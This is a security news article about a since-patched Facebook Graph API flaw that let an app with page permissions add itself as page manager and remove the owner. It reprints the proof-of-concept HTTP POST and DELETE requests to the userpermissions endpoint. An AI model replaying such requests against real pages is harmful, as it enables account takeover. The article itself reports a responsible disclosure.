Categories: Security newsTechnology

Facebook Fan pages can be Hijacked by Hackers to take Admin Control



Facebook vulnerability allows hackers to take admin control of the business pages on Facebook

Security researcher Laxman Muthiya has found a serious vulnerability in the way Facebook business manager allows third party access. This vulnerability can be exploited by hackers to gain limited permissions and the victim will permanently lose admin access to the page.

Detailing his findings on his blog, Laxman has stated that if the vulnerability is exploited, the hacker can take over admin privileges of a Facebook page and remove the victim.

 

By default Facebook application interface do not allow third party applications to add or modify page admin roles (page roles like manager, editor, analyst etc..). Third party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as admin to the page and remove the actual owner permanently.

However business pages on Facebook operate on different theory. There is an endpoint for business pages called userpermissions which allows to add or remove page admin roles who are already handling the Facebook business. Muthiya found out that there is a vulnerability in this endpoint which can be exploited to take over the business page of the victim and remove him/her from admin control.

Laxman found that he could make a manage_pages request to to this endpoint tool using following request



 POST /PGID/userpermissions HTTP/1.1
 Host: graph.facebook.com 
 Content-Length: 245
 role=MANAGER&user=X&business=B&access_token=AAAA...

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
Thats all! Target page is hacked!

Muthiya contacted the Facebook security team about the vulnerability. Facebook confirmed the vulnerability and awarded him a bug bounty of $2500.00. The vulnerability has been patched by Facebook.

Proof of concept video :

Hacking Facebook PagesAnother Serious Vulnerability in FacebookVulnerability : Hacking Facebook PagesStatus : FixedReward $2500 USDProof Of Concept : https://www.7xter.com/2015/08/hacking-facebook-pages.html

Posted by 7xter on Wednesday, August 26, 2015

vijay

Recent Posts

iOS web attack crashes, causes iPhones or iPads to restart

This new CSS-based web attack can crash and restart iPhones or iPads and can cause a Mac computer to freeze…

2 hours ago

Nvidia GeForce RTX 2080 Ti Release Postponed To September 27th

Nvidia delays the launch date of GeForce RTX 2080 Ti by a week Nvidia has decided to postpone the release…

1 day ago

Samsung’s Galaxy Note 9 catches fire in woman’s purse

Woman sues Samsung over Galaxy Note 9 bursting into flames A woman in Long Island has filed a lawsuit against Samsung after…

1 day ago

North Korean hacker charged for WannaCry and Sony cyberattacks

U.S. charges North Korean hacker for WannaCry, Sony cyber attacks The U.S. government on Thursday charged and sanctioned a North…

2 weeks ago

Google launches ‘Dataset Search’ to help scientists and journalists

Google Dataset Search: This new search engine helps scientists hunt for public data Google on Wednesday launched a new search…

2 weeks ago

Android Q will warn users for running apps made for older Android versions

Android Q will soon warn apps running on Android Lollipop or earlier It’s only been a month since Google has…

2 weeks ago